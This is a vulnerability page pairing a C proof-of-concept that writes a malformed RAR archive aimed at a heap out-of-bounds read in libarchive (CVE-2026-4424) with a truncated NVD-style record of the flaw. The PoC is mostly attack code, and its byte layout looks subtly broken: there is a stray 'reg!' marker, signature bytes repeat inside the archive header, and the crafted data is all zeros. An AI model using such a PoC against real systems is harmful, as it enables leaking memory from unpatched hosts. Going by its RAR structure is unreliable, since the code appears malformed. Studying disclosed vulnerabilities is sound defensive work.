CVE-2026-4424

/* CVE-2026-4424 PoC - Malformed RAR with LZSS window size transition This PoC demonstrates the heap out-of-bounds read in libarchive's RAR handler during compression method transitions with invalid LZSS window size. */ #include <stdio.h> #include <stdlib.h> #include <string.h> // RAR header structure typedef struct { unsigned char header_crc[2]; unsigned char header_type; unsigned char header_flags[2]; unsigned char pack_size[4]; unsigned char unpack_size[4]; unsigned char host_os; unsigned char file_crc[4]; unsigned char file_time[4]; unsigned char version; unsigned char name_length; unsigned char attributes; } rar_header_t; // Create a minimal PoC RAR file that triggers the vulnerability void create_poc_rar(const char* filename) { FILE *fp = fopen(filename, "wb"); if (!fp) { fprintf(stderr, "Failed to create file\n"); return; } // RAR signature unsigned char rar_sig[7] = {0x52, 0x61, 0x72, 0x21, 0x1A, 0x07, 0x01}; fwrite(rar_sig, 1, 7, fp); // First archive header block (marker block) unsigned char marker[4] = {0x72, 0x65, 0x67, 0x21}; fwrite(marker, 1, 4, fp); // Archive header with vulnerable LZSS parameters unsigned char archive_header[] = { 0x1A, 0x07, 0x01, // Signature 0x73, 0x7A, // Header CRC 0x01, // Type: archive header 0x00, 0x00, // Flags 0x00, 0x00, 0x00, 0x00, // Pack size 0x00, 0x00, 0x00, 0x00, // Unpack size 0x00, // Host OS 0x00, 0x00, 0x00, 0x00, // CRC 0x00, 0x00, 0x00, 0x00, // File time 0x29, // Version 0x00, // Name length 0x00 // Attributes }; fwrite(archive_header, 1, sizeof(archive_header), fp); // File header block with crafted LZSS window size unsigned char file_header[] = { 0x30, 0x30, // Header CRC 0x02, // Type: file header 0x01, 0x80, // Flags (packed size exceeds unpacked) 0xFF, 0xFF, 0xFF, 0xFF, // Pack size (large value) 0x00, 0x10, 0x00, 0x00, // Unpack size 0x03, // Host OS 0x00, 0x00, 0x00, 0x00, // File CRC 0x00, 0x00, 0x00, 0x00, // File time 0x29, // Version 0x08, // Name length 0x20, // Attributes // File name: "test.bin" 0x74, 0x65, 0x73, 0x74, 0x2E, 0x62, 0x69, 0x6E }; fwrite(file_header, 1, sizeof(file_header), fp); // Crafted packed data with LZSS window size transition // This triggers the vulnerability when libarchive processes it unsigned char packed_data[] = { 0x00, 0x00, 0x00, 0x00, // LZSS dictionary size field 0x00, 0x00, 0x00, 0x00, // Padding 0x00, 0x00, 0x00, 0x00, // More data 0x00, 0x00, 0x00, 0x00 }; fwrite(packed_data, 1, sizeof(packed_data), fp); // End of archive marker unsigned char end_marker[] = {0xC4, 0x3D, 0x7B, 0x00, 0x40, 0x00, 0x00, 0x00}; fwrite(end_marker, 1, sizeof(end_marker), fp); fclose(fp); printf("PoC RAR file created: %s\n", filename); } int main(int argc, char* argv[]) { const char* output_file = (argc > 1) ? argv[1] : "cve_2026_4424_poc.rar"; create_poc_rar(output_file); printf("To test: Use vulnerable version of libarchive to extract this file\n"); return 0; }

{"cve": {"id": "CVE-2026-4424", "sourceIdentifier": "[email protected]", "published": "2026-03-19T15:16:28.300", "lastModified": "2026-05-21T04:16:29.920", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in libarchive. This heap out-of-bounds read vulnerability exists in the RAR archive processing logic due to improper validation of the LZSS sliding window size after transitions between compression methods. A remote attacker can exploit this by providing a specially crafted RAR archive, leading to the disclosure of sensitive heap memory information without requiring authentication or user interaction."}, {"lang": "es", "value": "Se encontró una falla en libarchive. Esta vulnerabilidad de lectura fuera de límites de la pila (heap) existe en la lógica de procesamiento de archivos RAR debido a una validación incorrecta del tamaño de la ventana deslizante LZSS después de las transiciones entre métodos de compresión. Un atacante remoto puede explotar esto al proporcionar un archivo RAR especialmente diseñado, lo que lleva a la divulgación de información sensible de la memoria de la pila (heap) sin requerir autenticación ni interacción del usuario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libarchive:libarchive:-:*:*:*:*:*:*:*", "matchCriteriaId": "6A51945D-40D7-4C28-B0BB-774687265DCE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:hardened_images:-:*:*:*:*:*:*:*", "matchCriteriaId": "87DEB507-5B64-47D7-9A50-3B87FD1E571F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "932D137F-528B-4526-9A89-CD59FA1AB0FE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.16:*:*:*:*:*:*:*", "matchCriteriaId": "0EBB38E1-4161-402D-8A37-74D92891AAC5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:openshift_container_platform_for_arm64:4.16:*:*:*:*:*:*:*", "matchCriteriaId": "D3056B67-E5C4-40A0-86BF-1D9E6637B13F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:openshift_container_platform_for_power:4.16:*:*:*:*:*:*:*", "matchCriteriaId": "0EC48A26-5827-4EC0-BE90-EA25F0A9B56C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.2:*:*:*:*:*:*:*", "matchCriteriaId": "6897676D-53F9-45B3-B27F-7FF9A4C58D33"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux_server_aus:8.4:*:*:*:*:*:*:*", "matchCriteriaId": "E28F226A-CBC7-4A32-BE58-398FA5B42481"}]}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:10065", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://access.redhat.com/errata/RHSA-2026:10097", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://access.redhat.com/errata/RHSA-2026:11768", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://access.redhat.com/errata/RHSA-2026:12071", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:12274", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:13812", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:14773", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:14937", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:15087", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:16008", "source": "[email protected]"}, {"url": ... (truncated)